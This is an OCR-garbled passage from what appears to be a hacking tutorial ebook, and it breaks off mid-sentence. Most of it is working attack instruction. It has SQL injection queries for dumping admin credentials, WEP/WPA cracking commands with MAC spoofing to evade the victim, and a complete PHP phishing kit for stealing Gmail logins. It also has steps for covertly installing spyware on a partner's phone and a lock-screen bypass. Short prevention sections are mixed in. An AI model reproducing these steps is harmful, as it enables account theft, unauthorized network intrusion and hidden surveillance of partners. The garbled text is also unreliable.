on, you can see a toolbar that 
will look like the following 
one. If you are not able to see 
the Hackbar, then press F9. 


Select sql->Mysql- 
>MysqlChar() in the 
Hackbar. 


It will ask you to enter string 


that you want to convert to 
MySQLCHAR(). We want to 
convert the table name to 
MySQLChar . In our case the 
table name is 'admin'. 


& No text was selected for the requested action 


admin| 


Now you can see the 
CHAR(numbers separated 
with commans) in the Hack 
toolbar. 


Copy and paste the code at 
the end of the url instead of 
the "mysqlchar" 


For eg: 
http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 
1,2,group_concat(column_nan 
from 

information schema.columns 
where 

table name-CHAR(97, 100, 


109, 105, 110)— 

The above query will display 
the list of column. 

For example: 


admin,password,admin id,adr 
admin name,admin pass,adn 
га, admin,admin usern 
me,username,password..etc.. 


Now replace the replace 
group concat(column name) 
with 

group concat(columnnamel,0 


Now replace the " from 
table name=CHAR(97, 100, 
table name" 

information schema.columns 
where 


109, 105, 110)" with the 
"from 

For eg: 
http://www.anyselectedsite.co: 
id=-2 

and 1=2 union select 
1,2,group_concat(admin_1id,0x 
from admin- 


If the above query displays 
the 'column is not found' 
error, then try another column 
name from the list. 


If we are lucky, then it will 
display the data stored in the 
database depending on your 
column name. For example, 
username and password 
column will display the login 
credentials stored in the 
database. 


Step 7: Finding the Admin 
Panel: 


Just try with url like: 
http://www.anyselectedsite.co: 
http://www.anyselectedsite.co: 
http://www.anyselectedsite.co: 
http://www.anyselectedsite.co: 
etc. 


If you are lucky, you will find 
the admin page using above 
urls or you can use some kind 
of admin finder tools like 


Havij admin finder, sql 
poison for SQL attacking 
(tool). 


And once you found the 
admin panel you have to do 
further works on your own 
risk. 

PREVENTION: 


This article is focused on 
providing clear, simple, 
actionable guidance for 
preventing SQL Injection 


flaws ш your applications. 
SQL Injection attacks are 
unfortunately very common, 
and this is due to two factors: 


1.) The significant prevalence 
of SQL Injection 
vulnerabilities, and 

2.) The attractiveness of the 
target (1.e., the database 
typically contains all the 
interesting/critical data for 
your application). 


It’s somewhat shameful that 
there are so many successful 
SQL Injection attacks 
occurring, because it is 
EXTREMELY simple to 
avoid SQL Injection 
vulnerabilities in your code. 


SQL Injection flaws are 
introduced when software 
developers create dynamic 
database queries that include 
user supplied input. To avoid 
SQL injection flaws 15 


simple. Developers need to 
either: a) stop writing 
dynamic queries; and/or b) 
prevent user supplied input 
which contains malicious 
SQL from affecting the logic 
of the executed query. 


This article provides a set of 
simple techniques for 
preventing SQL Injection 
vulnerabilities by avoiding 
these three problems. These 
techniques can be used with 


practically any kind of 
programming language with 
any type of database. 


SQL injection flaws typically 
look like this: 


The following (Java) example 
is UNSAFE, and would allow 
an attacker to inject code into 
the query that would be 
executed by the database. The 
invalidated*"customerName" 
parameter that 


issimplyappended to the 
query allows an attacker to 
inject any SQL code they 
want. Unfortunately, this 
method for accessing 
databases is all too common. 


String query = "SELECT 
account balance FROM 

user data WHERE 

user пате =" 

+ 
request.getParameter("custom 


try { 

Statement statement = 
connection.createStatement( 
... ); ResultSet results = 
statement.executeQuery( 


query ); 


j 
PREVENTIONS 


Option 1: Prepared 
Statements (Parameterized 
Queries): 


The use of prepared 


statements (parameterized 
queries) 1s how all developers 
should first be taught how to 
write database queries. They 
are simple to write, and easier 
to understand than dynamic 
queries. Parameterized 
queries force the developer to 
first define all the SQL code, 
and then pass in each 
parameter to the query later. 
This coding style allows the 
database to distinguish 
between code and data, 


regardless of what user input 
is supplied. 

Prepared statements ensure 
that an attacker is not able to 
change the intent of a query, 
even if SQL commands are 
inserted by an attacker. If an 
attacker were to enter the user 
ID' or'l'='1 , the 
parameterized query would 
not be vulnerable. 


2. Use dynamic SQL only if 
absolutely necessary. 


Dynamic SQL can almost 
always be replaced with 
prepared statements, 
parameterized queries, or 
stored procedures. For 
instance, instead of dynamic 
SQL, in Java you can use 
PreparedStatement() with 
bind variables, in .NET you 
can use parameterized 
queries, such as 
SqlCommand() or 
OleDbCommand() with bind 
variables, and in PHP you can 


use PDO with strongly typed 
parameterized queries (using 
bindParam()). 


In addition to prepared 
statements, you can use 
stored procedures. Unlike 
prepared statements, stored 
procedures are kept in the 
database but both require first 
to define the SQL code, and 
then to pass parameters. 


3:- Escaping All User 


Supplied Input 


This third technique is to 
escape user input before 
putting it in a query. If you 
are concerned that rewriting 
your dynamic queries as 
prepared statements or stored 
procedures might break your 
application or adversely 
affect performance, then this 
might be the best approach 
for you. However, this 
methodology 1s frail 


compared to using 
parameterized queries and 1 
cannot guarantee it will 
prevent all SQL Injection in 
all situations. This technique 
should only be used, with 
caution, to retrofit legacy 
code in a cost effective way. 
Applications built from 
scratch, or applications 
requiring low risk tolerance 
should be built or re-written 
using parameterized queries. 


This technique works like 
this. Each DBMS supports 
one or more character 
escaping schemes specific to 
certain kinds of queries. If 
you then escape all user 
supplied input using the 
proper escaping scheme for 
the database you are using, 
the DBMS will not confuse 
that input with SQL code 
written by the developer, thus 
avoiding any possible SQL 
injection vulnerabilities. 


4. Install patches regularly 
and timely. 


Even if your code doesn't 
have SQL vulnerabilities, 
when the database server, the 
operating system, or the 
development tools you use 
have vulnerabilities, this is 
also risky. This is why you 
should always install patches, 
especially SQL 
vulnerabilities patches, right 
after they become available. 


5. Remove all functionality 
you don't use. 


Database servers are complex 
beasts and they have much 
more functionality than you 
need. As far as security 15 
concerned, more is not better. 
For instance, the xp_cmdshell 
extended stored procedure in 
MS SQL gives access to the 
Shell and this is just what a 
hacker dreams of. This is why 
you should disable this 


procedure and any other 
functionality, which can 
easily be misused. 


6. Use automated test tools 
for SQL injections. Even if 
developers follow the rules 
above and do their best to 
avoid dynamic queries with 
unsafe user input, you still 
need to have a procedure to 
confirm this compliance. 
There are automated test tools 
to check for SQL injections 


and there is no excuse for not 
using them to check all the 
code of your database 
applications. 


SQL INJECT 
ME 


TESTING SQL 
INJECTION BY 
USING TOOL 


One of the easiest tool to test 
SQL injections is the Firefox 
extension named SQL Inject 
ME. After you install the 


extension, the tool is 
available in the right-click 
context menu, as well as from 
Tools Options. The sidebar 
of SQL Inject ME is shown in 
the next screenshot and as 
you can see there are many 
tests you can run: 


SQL Inject Me 


SQL Inject Me lets you test the page you're viewing for SQL Injection 
vulnerabilities. 
Each tab represents a Form on the page and lists all the fields. Just Fill in good 


values For all the fields and mark which ones are to be tested (they will become 
yellow) then click either "Test with All Attacks" or "Test with Top Attacks", 


Test all forms with all attacks 
Test all Forms with top attacks 


|Unnamed form 1 


Г] |Change this to the value you want tested — 


locale-only 

Г] |on У 
lang 

Г] en-Ls v 
from 


[] | fen-US/firefox/addons/policy/0/7597/S2585?src=addondetal м 


You can choose which tests 
to run and which values to 
test. When you press one of 
the Test buttons, the selected 
tests will start. When the tests 
are done, you will see a report 
of how the tests ended. 


There are many options you 
can set for the SQL Inject ME 
extension, as shown in the 
next two pictures: 


SQL Inject ME Options 


"NE. 


General 501 Injection Strings 


iv] Show ‘Open Sidebar’ in context menu. 
[Г] Show passed results in final report (Warning: long reports wil cause heavy cpu load) 
Preferred number of attacks to test 

9 

Number of tabs to use for testing 


6 
Pause between adding ems to sidebar (in ms). 


3 


SQL Inject ME Options 


1 АМО USER, NAME 

'; DESC users; 

"n 

Y AND non. existant. table = '1 


Result Strings 
Result Strings are strings that are found in pages where the result is submitted and signify that the test has FAILED. 


осес 

odbc 

Stack trace 

Database Engne error 
OleDbEsception 

Sorry, could not execute query 
Error has occurred 

error occured 

Could rot update 

Error with SQL Query 


As you see, there are many 
steps you can take in order to 
clean your code from 


potential SQL injection 
vulnerabilities. Don't neglect 
these simple steps because if 
you do, you will compromise 
the security not only of your 
sites but also of all the sites 
that are hosted with your web 
hosting provider. 


WPA2 
TESTING 


WI-FI HACKING 
USING 
BACKTRACK 


After performing the SQL 
injection, I can bet that now 
you have the endless curiosity 
to explore more about the 


ethical hacking. And as 
according to your need now 
in this article we are going to 
perform a hardcore hack 
using Backtrack Linux. we 
are going to learn that how to 
crack the WI-FI using 
Backtrack.one more thing I 
want to add here that all these 
stuff I am sharing with you is 
only for study purpose .if you 
have the black intentions just 
leave the book now. If you 
are performing this article on 


your computer, you will be 
responsible for any damage 
occurred by you. 


So let’s start the article: 


Now let us start with the Wi- 
Fi cracking. But before 
starting the tutorial let me 
give you a small introduction 
to what Wi-Fi hacking is and 
what is the security protocols 
associated with it. 


In a secured wireless 
connected the data on internet 
is sent via encrypted packets. 
These packets are secured 
with network keys. There are 
basically 2 types of security 
keys: 


WEP (Wireless Encryption 
Protocol):- This is the most 
basic form of encryption. 
This has become an unsafe 
option as it is vulnerable and 
can be cracked with relative 


ease. Although this is the case 
many people still use this 
encryption. 

WPA (WI-FI Protected 
Access) : This is the most 
secure wireless encryption. 
Cracking of such network 
requires use of a wordlist 
with common passwords. 
This is sort of brute force 
attack. This is virtually 
uncrackable if the network is 
secured with a strong 
password 


So let’s begin the actual W1- 
Fi Hacking tutorial! In order 
to crack Wi-Fi password, you 
require the following things: 


For the Wi-Fi hacking you 
need to install the Backtrack 
on your computer. 


I am assuming that you have 
already installed the 
Backtrack on your pc. If not 
it's very easy to install by 
making bootable live 


CD/DVD. For installing 
processes you can just 
Google it. You will get it 
easily. 


| «г back track [= 


Now open the console from 
the taskbar, Click on the icon 
against the dragon like icon in 
the taskbar in the above 


screenshot. 

You will have a Command 
Prompt like Shell called as 
console terminal. 


1) Let's start by putting our 
wireless adapter in monitor 
mode. It allows us to see all 
of the wireless traffic that 
passes by us in the air. Type 
airmon-ng in the console 
terminal and press Enter. You 
will have a screen like this, 
note down the name of 


interface, in this case the 
name is УЛапо. 


|^ м X root@root: ~ 


File Edit View Terminal Help 


root@root:~# airmon-ng 


Chipset Driver 


Intel 5300AGN iwlagn - [phy6] 


2) Now type ifconfig wlanO 
down and hit enter. 


This command will disable 
your wireless adapter; we are 


doing this in order to change 
your MAC address. 


Now, you need to hide your 
identity so that you will not 
be identified by the victim.to 
do this you need to type 
ifconfig wlanO hw ether 
00:11:22:33:44:55 and hit 
enter. 


This command will change 
your MAC address to 
00:11:22:33:44:55. 


3) Now the next work is to 
type airmon-ng start wlanO 
and press enter. 


This will start the wireless 
adapter in monitor mode. 
Note down the new interface 
name, it could be ethO or 
топо or something like that. 


The above command in the 
console has started your 
network adapter in monitor 
mode as mond: 


4) Now that our wireless 
adapter is in monitor mode, 


we have the capability to see 
all the wireless traffic that 
passes by in the air. We can 
grab that traffic by simply 
using the airodump-ng 
command. 


This command grabs all the 
traffic that your wireless 
adapter can see and displays 
critical information about it, 
including the BSSID (the 
MAC address of the AP), 
power, number of beacon 


frames, number of data 
frames, channel, speed, 
encryption (if any), and 
finally, the ESSID (what most 
of us refer to as the SSID). 
Let's do this by typing: 


airodump-ng monO 


In the above screenshot there 
is a list of available networks, 
Choose 1 network and note 
the BSSID and channel of it. 
5.) Type airodump-ng -c 
channel no —bssid BSSIDNI 
11010 -w filename and hit 


enter. 


Replace channel no. and 
BSSIDNI with the data from 
step 4. Replace the monO 
with network interface name 
from step 3. In place of 
filename write any name and 
do remember that. Better use 
filename itself. 


This command will begin 
capturing the packets from 
the network. You need to 
capture more and more 
packets in order to crack the 


Wi-Fi password. This packet 
capturing is a slow process. 


6.) To make the packet 
capturing faster, we will use 
another command. Open a 
new shell, don't close the 
previous shell. In new shell 
type aireplay-ng -1 0 -a 
BSSIDNI -h 
00:11:22:33:44:55 mon0 and 
hit enter. 


Replace the BSSIDNI with 


the data from step 4 and 
11010 from step 3. This 
command will boost the data 
capturing process. 

The -1 tells the program the 
specific attack we wish to use 
which in this case is fake 
authentication with the access 
point. The 0 cites the delay 
between attacks, -a is the 
MAC address of the target 
access point, -h 1$ your 
wireless adapters MAC 
address and the command 


ends with your wireless 
adapters device name. 


7.) Now wait for few minutes, 
let the DATA ш the other 
console reach a count of 
5000. 


8.) After it reaches 5000, 
open another console and 


type aircrack-ng filename- 
01.cap and hit enter. 

Replace the filename with the 
name you used in step 5. Add 
-01.cap to it. .cap is the 
extension of file having 
captured data packets. After 
typing this command, 
aircrack will start trying to 
crack the Wi-Fi password. If 
the encryption used is WEP, 
it will surely crack the 
password within few minutes. 


In case of WPA use the 
following command instead 
of the above aircrack-ng -w 
/pentest/wireless/aircrack- 
ng/test/password.Ist -b 
BSSIDNI filename-01.cap 


Replace BSSIDNI and 
filename with data you used. 
/pentest/wireless/aircrack- 
ng/test/password.lst is the 
address of a file having 
wordlist of popular 
passwords. In case of WPA 


aircrack will try to brute force 
the password. As I explained 
above that to crack WPA you 
need a file having passwords 
to crack the encryption. If 
you are lucky enough and the 
network owner is not smart 
enough, you will get the 
password. 


PREVENTION: 


For the prevention from being 
hacked you can refer to the 
chapter 


“PASSWORD CREATING 
POLICIES”. 


NEWBIE’S WAY 
TOWARDS 
REVERSE 
ENGINEERING 


Now-a-days people expect 
more than something with an 
application as it is provided 
by the developers. People 
want to use that specific 
application according to their 
own preferences. So now we 


are here with an article on the 
topic reverse engineering. 
Let’s start with simple 
engineering, “simple 
engineering” 15 the task to 
develop/build something 
BUT Reverse engineering 
refers to the task to 
redevelop/re-build something. 
In simple words reverse 
engineering is the task to 
modify the source code of the 
application to make it work 
according to our way, 


Reverse engineering 15 a very 
complicated topic and is very 
difficult to understand for 
beginners as it requires a 
prior knowledge of assembly 
language. 


Developing is easy but to re- 
developing is not easy 
!!Because while development 
a programmer has to deal 
with the functions, pointers, 
conditions, loops etc... But 
while DE-compilation 


process we need to deal with 
registers ! 


Generally 32 bit / 64 bit 
windows supports mainly 9 
registers: — 


Performing Registers 


> EAX : Extended 
Accumulator Register 


> EBX : Base Register 
> ECX : Counter Register 


> EDX : Data Register 


Index 


> ESI : Source Index 

> EDI: Destination Index 
Pointer 

> EBP : Base Pointer 


> ESP : Stack Pointer 
> EIP : Instruction Pointer 


So , let’s move towards our 
way “How to modify the 
applications” 

The general requirements you 
need for the modification are 
listed below and easily 
available on the internet: — 
1.OllyDBG 


2.Crack Ме App( click here 
to download)(register and 
activate your account before 


download) 
PROCESS: 


When you have downloaded 
both the apps ,first of all you 
need to launch the Crack Me 
App. 

It will ask you to enter the 
password, enter any password 


Now it will show you the 
error that “You are not 


authorized to use the 
application". 


njijoem 


Password app for crackmes.de by R.Holland 2007 Ќа 


You are not authorized to use the application. 


E 


Now open the OllyDBG and 
open the Crack me app in it. 
When you have opened the 
Crack me app in 
OllyDBG,now in the upper 


left box, while scrolling up 
you find the statement like 
this:- JE SHORT 
Password.00457728 


Basically, this is a 
conditional jump that means 
if the condition is true then it 
will jump to 00457728 Which 
shows us the message “You 
are not authorized to use the 


application” and if the 
condition is not true it just 
continues reading the code, 
So we don’t need this jump to 
work as we don’t want to get 
the error message. 


Now for removing the error 
message, we can change JE 
SHORT Password.00457728 
to JNE SHORT 
Password.00457728, 
JNE(Jump If Not Equal) 
means that if the password 1$ 


correct it will give you the 
error message and if the 
password is incorrect it will 
give you the correct message. 


For changing the query just 
double click the line JE 
SHORT Password.00457728 
and simply change it to JNE 
SHORT Password.00457728 


and Hit on “Assemble”. 


Now HIT on blue “PLAY” 
button in the upper side of the 
OllyDBG to start the Crack 
me app again and enter the 
password then it will give you 
the correct message. 


H^ 

[€] File View Debug Options Window Help 
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You are authorized to use Эр °°*2®! 


ries the application word. 
@04576ЕЄ 


Password. 20450588 


3815 80554599 
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PHISHING 
ATTACK AHEAD 


J the BIC computing 


EMAIL AND 
FACEBOOK 
HACKING BY 
PHISHING 


What is phishing? 


Phishing is an attempt by the 
sender to have the receiver of 
the email to release their 
personal information 1.е. the 
attacker lures the victims to 


give some confidential 
information. 


Why phishing? 


There are many password 
cracking tools that are 
coming and going into/from 
the market. But phishing is 
the most efficient method to 
steal confidential information 
like, passwords, Credit card 
numbers, Bank account 
numbers etc. 


How phishing works? 


It works just like normal 
fishing. 

A fisherman generally throws 
bait into the water to lure the 
fish. Then a fish comes to 
take the food feeling that it 1$ 
legitimate. When it bites the 
bait, it will be caught by the 
hook. Now the fisherman 
pulls out the fish. 


In the same way, the hacker 


sends a fake login page to the 
victim. The victim thinks that 
it is a legitimate one and 
enters his confidential 
information. Now the data 
will be with the hacker. 

Now, let’s learn how to hack 
by phishing: 

I am selecting Gmail account 
to be hacked by phishing. 


For phishing you need the 
following stuffs: 
First of all you have to open 


the gamil.com by your 
browser and when page open 
completely „just give a right 
click on the page and a 
dialogue box will opens after 
you having an option “view 
page source" in it. 

Clickon the *view page 
source" option and you see 
that the source code of that 
page will opens after you. 
Then press ctrl+F to open the 
text/word finding box. 

Type “action=” and replace 


it with anything.php 

Such as “action=mail.php” 
Then find for the 

“method=” and also replace it 
with "get". Such as 
method-"get". 


Then save the file by 
anything.html Such as 
"Gmail.html" 

Then create a blank notepad 
file “log.txt” 

The again open the notepad 
and type the following codes: 


<?php 

header("Location: 
http://www.Gmail.com"); 
$handle = fopen("logs.txt", 
"а"); 

foreach($ GET as $variable 
=> $value) 1 fwrite(Shandle, 
$variable); 

fwrite(Shandle, "="); 
fwrite($handle, $value); 
fwrite($handle, "\r\n"); 


j 
fwrite($handle, "\r\n"); 
fclose($handle); exit; 


2» 


Andsave it as “mail.php” 
(save this file by same name 
as you have replaced the 
"action-") 

Now finally you have the 
three files which are required 
for the phishing. 

1) Gmail.html (fake login 
page) 

2) mail.php (to capture the 
login details) 

3) log.txt (to store the 


captured details) 


Procedure: 

stepl: create an account in 
any free web hosting site like 
www.bythost.com 
www.000webhost.com 
WWW.ripway.com 
www.my3gb.com 


step2: Now upload all the 
three files you have 
downloaded.(I have taken 
www.my3gb.com) 


step 3: Give the link of the 
fake page to your victim. 


eg: 
www. yoursitename.my3 gb.co: 
Step 4: when he clicks the 
link, it opens a fake Gmail 
page where he enters his 
login details. When he clicks 
sign in button, his login 


details will be stored in 
log.txt file. 
Demonstration: 


Here I have uploaded my 
scripts on to 
www.my3gb.com 


[es TX ктт ETE m mI 
AN Name Туре Size Owner Group Perms Mod Time Actions 
eu 


жк 
And copy the Gmail.html link 
which you have to send the 
victim. 1 clicked the 
Gmail.html link 

A fake page was opened 
where 1 entered my login 
details. 


BE v эээ Фес ем И 


This page will looks exactly 
similar to the original Gmail 
login page. And when the 
victim enters his/her login 
details for logging in into 
his/her account. 

Now, this time the victim will 


redirected to the original 
Gmail login website. 

The victim will even don’t 
know that his/her account got 
hacked. Victim will think that 
the page gets reloaded due to 
internet errors or login 
mistakes etc. 


Now his/her login details 
were captured by the php 
script and stored in log.txt file 
as shown in the figure below: 


In the same way you can hack 
FACEBOOK accounts and 
other social networking 
accounts. 

How to protect ourselves 
from phishing? 

Don’t use links 


Be suspicious of any e-mail 
with urgent requests 

By using secured websites 
Using efficient browsers 
Using Antivirus or internet 
security software. 


USB 
SECURITY 


Securing Pen Drives 
From Malicious 
Viruses 


Today, a giant downside for 
windows user is to secure 
their data from viruses. 
Especially, in Pen drives, 


nobody needs to keep their 
vital data in pen drives as a 
result of pen drives square 
measure transportable devices 
and through sharing data it 
may get infected by virus like 
shortcut virus, Autorun.inf , 
and new folder virus etc. 
Some folks recover their data 
by merely using Command 
prompt however some folks 
assume there’s solely 
possibility left and it 1$ to 
format the pen drive. 


So, if your pendrive is 
infected by any of those virus 
you can merely follow these 
step to induce your hidden 
data back. 


Open CMD (command 
prompt) 

Open Flash drive in CMD ( if 
your drive is ‘G’ than enter 
*G:' after c:\user\ press 
[ENTER] ) 

Now type following 
command and hit enter: 

attrib -s -h /s /d 


Now open your pen drive in 
windows you may see all of 
your files . However wait ! is 
it enough ? No way! your pen 


drive is still not totally secure 
. Higher than command 
simply shows all of your files 
that square measure hidden 
by viruses. If you want to 
shield your USB from 
obtaining unwanted files 1.e. 
virus, worm, spy, Trojan etc. 
then you need to follow these 
steps. 


What I’m going to tell you is 
tha t a way to setup your 
registry to finish a computer 


from saving files to your 
USB. If you have windows 
seven or windows eight then 
you'll immobilize the writing 
choice to USB drives. This 
trick is incredibly useful if 
you have virus in your laptop 
and want to repeat files from 
a USB Drive however also 
don't want to transfer virus to 
the USB. Follow the given 
steps to disable the USB 
writing option: 


Open notepad and replica and 
paste the following: 


Windows registry Editor 
Version 5.00 

[HKEY LOCAL MACHINE 
evicePolicies] 


“WriteProtect”=dword:00000( 
Now keep the file with the 


99 


extension “тер”. 


Click on the file you now 
saved. within the pop-up 


window selected affirmative 
and then OK. 

That's it your USB is 
currently secure 
TURNING THE 
SECURITY OFF 


To just off this security 
measure 

Open notepad and copy and 
paste the following: 
Windows Registry Editor 
Version 5.00 


[HKEY LOCAL MACHINE 
evicePolicies] 
“WriteProtect”=dword:00000( 


Now overlo oked the file with 
the extension *.reg". Click on 
the file you currently saved. 
within the pop-up window 
click affirmative and then 
OK. That’s it your defense 15 
currently disabled. 


PDF 
SECURITY 


HOW TO 
PROTECT YOUR 
PDF FILES FROM 
COPYING 


Now these days it’s a big deal 
to secure your PDF 


documents. In this article I 
will show you that “HOW TO 
PROTECT YOUR PDF 
FILES FROM BEING 
COPIED FOR PIRATION 
AND OTHER MALITIOUS 
INTENTIONS”. 


For protecting your PDF files 
you can use a tool “A-PDF 
password security” to protect 
a PDF file. You can set 
password and prevent people 
from copy and paste PDF 


contents, here is an easy 
tutorial to make you aware 
about the use of that tool. 


Install the “A-PDF 
password security”. 
Launch the program and 
open the password protect 
wizard. 


2% A-PDF Password Security с { (8) { 03 


С» A-PDF Password Security 


E. © Single FOF Document Security Ld Wek Directory 
ә 


Е: Batch POF Documents Security 


А То enabie hot rectory in windows service, please check the Server Edtion, 


Please select a mode and dick ‘Next’ to begn, or ‘But’ to ext the wizard. 


select the option “single pdf 
document security” and push 
the button “next>” 

Click “browse” button to 
open a pdf file will be 


encrypted, select the security 
level and encryption method. 
You can setup password for 
opening and modification of 
your document. 


A-PDF Password Security = 1 [е] 


[vor ] Security Setting 
| sete roe tn wich you немок ве рывка пох sting 
Soares Por Fae, [Cewenrniceecvecoryntersbocarnentscybor Віка Sason Ponce € 
Security Level hsgh(256-b& AES; Acrobat 9.0 and above) у т” 
Print 
(7 Require a password to open the document is 
Document Open Password yoozay Х Document Assembly 
Permissions. x Айю Form Field Fillin 
|V Use a password to restrict permissions or Signing 
— x Authoring Comments. 
Permissions Password: — yoozay ern erri 
Print Alowed: None x X Changng the Document 
Changes Allowed None v x Allow Content Copying 
or Bxtrachon 
Enable copying of content x Content Accessiblity 
Enable text access for screen reader devices for the usualy тран Enabled 
Security | Properties [АВА Expiry Date 
Ф oro «һа Ш 95 


Click “save” or “save as” to 
set a document open 
password and disallow 
copying permission. 


A-PDF Password Security -5 


After saving the file you will 
choose to open saved PDF 
file with the default PDF 
viewer, set another PDF file 
security or open destination 


folder in windows explorer. 


Finished 
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fei Set Another POF Ме Securty 
open enorypted PO Pere 
( Opan Destination Folder 
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Open saved PDF file with 
the default PDF viewer. 


NOTIFY ME 


SENDING A 
MESSAGE TO 
OTHER USER IN 
YOUR PC 


In this article we are going to 
learn that how to send any 
message to the other user 
account associated with your 


own pc. 


Let’s assume if you want to 
leave any message for your 
brother and sister who have 
user accounts associated with 
the same pc in which you 
have also a user account. 


So follow these steps to pass 
any message which you to 
another user account at his 
next login. 


Open the task manager of 
your рс by clicking 
CTRL+ALT+DEL keys 
simultaneously. 

Then click on user option to 
view the available user 
account associated with your 


pe. 
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Select any another user 
account which you want to 
pass the message. 

Then click on the “send 
message” option place ш the 
lower right corner. 
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A dialogue box will be open 
after you. 

Type any message you want 
to convey them. 

If you want to shock them 
then you can type “HELLO 
USER... YOUR COMPUTER 


IS INFECTED BY 
TROJAN” 


And when another user login 
to his/her user account, the 
same message will be 
displayed to him. 


“ТАМ A FOLDER I 
DON’T HAVE A 
NAME” -------- ү 
HOW TO CREATE 


A FOLDER WITH 
EMPTY NAME 


This is the most interesting 
article of this book, and here I 
will show you that how no 
create a folder without 
naming it. Sometimes it will 
be very useful for you. 


Let’s assume you have hided 
any folder simply. And when 
you will search it by name 


from the address bar it will be 
opened easily. So let’s 
thinkthatif therewillbeany 
folder withoutname thenhow 
can it be possible to search it 
from address bar or search 
box. 
So follow these steps to 
create a folder without name: 
Open the location where 
you want to create the folder. 
Just right click anywhere to 
create the folder. 


When it asks to rename the 
folder just click ALT key and 
by keep pressing the ALT key 
press “2, 5, 5” one by one. 

And then enter. 


You will find that there it 


creates a folder without 
having any name. 


SPYING WITH 
ANDROID 


HACKING 
ANDROID PHONE 


Hello friends, now in this 
article we will learn that how 
to spy over an android phone. 
Now these days are the era of 
smart phones based on 


android specially. In this 
article I will show you that 
how to get the details of the 
victim by spying over 
victim’s android phone. This 
is the best way to keep 
tracking your child and also 
your girlfriends. 


For spying now I am using a 
tool name as THE TRUTH 
SPY. 


GPS History 


+ Loading... 


theeruanS PY 


Settings Account Infomation 


Rcsourecs Logout 
E 
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© My Dashboard 
Explore Dcviec 
GPS History 
SMS History 
Calf History 


Auto Answer 


By using this tool you can 
easily keep tracking the 
victim’s android phone. 


I am showing you the screen 
shots of those things which 
we can spy from an android 
phone...such as CALL 
HISTORY, WHATSAPP 
MESSAGES, and SMS 
DETAILS etc. ...list is shown 
below in the screenshot. 


Q URL History 
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5 Арр Usage History * 

> Phone Calf Reeording ы 


КЭ whatsapp History 
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J viber History 
9 bof. History 
Oskype History 


£- Notes History * 
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* for iOS only 
= for Android only 
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Note:- this tool is also 
available for IOS devices. 


You have to follow the steps 
to start spying. 


First of all you have to 
download the apk file of this 
tool and install it on the 
victim’s android phone and 
log into it. 

This tool is only of 800kb so 
you can easily manage it 


within seconds. 

A very interesting thing is 
about this tool 1s that you can 
also hide this tool from the 
victims android phone.so that 
victim will not aware about it. 
Now you can download the 
apk file from the website 
(my.thetruthspy.com). 

After installing the app go on 
the same website of the app 
by your computer and resister 
using your email id and login 
to view the details of the 


victim’s android phone. 

For getting details get ensure 
that the data connection of the 
victims phone should be ON. 
When you want to unhide 
the app from the victim’s 
phone just make a call from 
the victim’s phone to #2013*. 


Note: - sometimes this 
"thetruthspy" is stop 
working.so you can also 
search any other spy tool by 
simple Google searches. You 


will find a lot of tools like 
this and have almost same 
functioning. 


MOBILE: “I 
CAN 
CONTROL 
YOUR PC” 


FULL CONTROL 
YOUR PC BY 
PHONE 


Now I have a very interesting 
thing for you ...... I know you 
got tired by those difficult 
hackings chapters mentioned 
in above chapters. 


In this article I are going to 
tell you that how to control 
your computer fully by your 
mobile phone. It's a very 
interesting thing for you if 
you got tired by using the 
track pad and keyboard of 
your computer. 


So let’s see how to do it: 

In this article I am going to 
use a tool name as UNIFIED 
REMOTE which 1s used to 
remote our pc. 


Unified remote 15 an app that 


lets you control your entire 
windows computer from your 
android device.it turns your 
device into a Wi-Fi or 
Bluetooth remote control for 
all the programs on your 
computer. With this app you 
can control a wide range of 
applications, including simple 
mouse and keyboard, media 
players and other external 
gadgets that can be connected 
to your computer(such as 
USB-UIRT and tell stick). it 


even provides extensive 
capabilities for users to create 
their own custom remotes for 
their needs. 


You have to follow the 
simple steps to remote your 
pe by unified remote: 


Download and install the 
unified remote server on your 
computer (windows). You 
can easily find it by your 
Google searches. When you 


installed it .....Launch it. 


Connect your android phone 
to the same Wi-Fi network as 
your computer. Alternatively 
if your computer id Bluetooth 
ready, pair it with your 
phone. 


Download and install the apk 
file of unified remote from 
the play store. 

At launch, confirm that you 
have installed the server. 


Then add a new server, 
select “automatic” and the 
app will find your computer. 

Tap your computers name to 
connect. 

Now you are ready to start 
controlling your computer 
with phone. 

Tap remote in the app. 


N 15:52 
Unified Remote Full - 2.0 
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Basic Input 
B 


Mouse and keyboard remote. 


yay File Manager 


Remotes Servers г 
Remote file system manager. 
4 Keyboard 
X Advanced keyboard remote 
у 9 Media 
Preferences Diagnostics General media remote 
(©) Power 
Remote system power control 
48 36 © Slide Show 
Help Exit A generic Slide Show remote control 
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The “Basic input" remote 
will prompt the mouse, which 
you can use as a track pad. 

Instructions for using the 


mouse will appear on screen. 
Also there are lot of options 
are available by which you 
can control your computer in 
different ways. 
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Example: - keyboard 
controlling, file manager, 
media, power, start, YouTube 
etc. 


LAUNCH GOD 
MODE 


LAUNCHING 
WINDOWS GOD 
MODE 


Here I have a nice windows 
trick for you which saves 
your much time. In this 
article we will learn that how 


to launch GOD MODE in 
your computer. 


Windows god mode is a 
simple way to centralized 
access all the administrative 
options that are normally seen 
inside control panel into a 
newly created folder which 
can be placed anywhere 
inside computer. Usually the 
administrative options are 
seen scattered inside the 
control panel arranged in 


different categories and sub 
categories. Windows god 
mode arranges all the 
administrative options inside 
one single window. You find 
it much more neatly arranged 
and user friendly. 


Let’s see how to launch god 
mode in simple steps: 

You need to create a new 
folder for this launch. 

Right click at the window 
where you want to create a 


new folder. When it asks 
you to rename that folder you 
have to enter 


following codes with any 
word. 


Example:Ujjwal. { 
ED7BA470-8E54-465E- 
825C99712043E01C | 

Or 

Saurabh. { ED7BA470-8E54- 
465E-825C-99712043E01C } 
Or 


Anything. { ED7BA470- 
8E54-465E-825C- 
99712043E01C | 


Don’t forget to use curly 
brackets. 
After renaming the folder 


press enter. 


= 1 Sy = aj Sey 
ва ва ва га га а 28 


- 


And you will see that the icon 
of that folder will be changed 
and when you will open it 
you will find all the settings 
arranged in well manner in it. 


CRACKING 
LOCKSCREEN 


HOW TO CRACK 
ANDROID LOCK 
SCREEN 


In this article we are going to 
learn that how to bypass the 
android lock screen. 


We are going to bypass the 
lock screen using a tool name 
as Aroma File manager. 
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AROMA Filemanager 
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e= adobe 
--Xwxr-x | File 
nes Alarms 

--XDWXI-X 0 File 
= Android 

--XIWXI-X | File 
тан angry_birds_backup 

--xrwxr-x 6 Files 
"= backup 

--XDWXI-X | File 
mm bluetooth 

--XIWXI-X 9 Files 
mes burstlylmageCache 
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New Folder X Favorites Select All Menu 


This is the best method for 
crack android pattern lock; 
you must have custom 
recovery installed on your 
device in order to use this 
